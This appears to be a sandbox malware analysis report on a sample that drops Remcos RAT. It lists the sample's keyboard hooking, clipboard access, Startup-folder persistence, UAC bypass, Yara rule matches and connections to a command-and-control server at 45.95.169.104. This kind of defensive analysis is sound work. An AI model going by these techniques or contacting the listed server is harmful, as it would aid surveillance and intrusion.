                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00407CD2
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49704 -> 45.95.169.104:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49721 -> 45.95.169.104:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49722 -> 45.95.169.104:2404
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.95.169.104 2404Jump to behavior
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 5.95.169.104
                  Source: global trafficTCP traffic: 192.168.2.5:49704 -> 45.95.169.104:2404
                  Source: Joe Sandbox ViewASN Name: GIGANET-HUGigaNetInternetServiceProviderCoHU GIGANET-HUGigaNetInternetServiceProviderCoHU
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CE25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00CE25E2
                  Source: svchost.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: name.exe, 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000005_2_0040A2F3
                  Installs a global keyboard hook
                  Source: C:\Windows\SysWOW64\svchost.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CE425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_00CE425A
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CE4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00CE4458
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00094458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00094458
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004168FC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004168FC
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CE425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_00CE425A
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00CD0219
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CFCDAC
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000ACDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_000ACDAC
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2348733537.000000000522F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348427875.0000000003400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181376722.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041CA73 SystemParametersInfoW,5_2_0041CA73
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0041CA73 SystemParametersInfoW,12_2_0041CA73

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: This is a third-party compiled AutoIt script.0_2_00C73B4C
                  Source: jv4ri.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: jv4ri.exe, 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c0dda5a9-9
                  Source: jv4ri.exe, 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d83c89d0-f
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: This is a third-party compiled AutoIt script.2_2_00023B4C
                  Source: name.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: name.exe, 00000002.00000002.2039583863.00000000000D5000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fa566f94-4
                  Source: name.exe, 00000002.00000002.2039583863.00000000000D5000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_86ebd91a-8
                  Source: name.exe, 00000004.00000002.2054778566.00000000000D5000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_303ad09c-e
                  Source: name.exe, 00000004.00000002.2054778566.00000000000D5000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5c8f98c1-1
                  Source: name.exe, 0000000B.00000002.2181378905.00000000000D5000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_95c98581-9
                  Source: name.exe, 0000000B.00000002.2181378905.00000000000D5000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ebf983c2-8
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C73633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00C73633
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFC27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00CFC27C
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFC220 NtdllDialogWndProc_W,0_2_00CFC220
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFC49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00CFC49C
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFC788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00CFC788
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFC8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00CFC8EE
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFC86D SendMessageW,NtdllDialogWndProc_W,0_2_00CFC86D
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFCBF9 NtdllDialogWndProc_W,0_2_00CFCBF9
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFCBAE NtdllDialogWndProc_W,0_2_00CFCBAE
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFCB50 NtdllDialogWndProc_W,0_2_00CFCB50
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFCB7F NtdllDialogWndProc_W,0_2_00CFCB7F
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFCC2E ClientToScreen,NtdllDialogWndProc_W,0_2_00CFCC2E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CFCDAC
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFCD6C GetWindowLongW,NtdllDialogWndProc_W,0_2_00CFCD6C
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C71287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,0_2_00C71287
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C71290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00C71290
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFD6C6 NtdllDialogWndProc_W,0_2_00CFD6C6
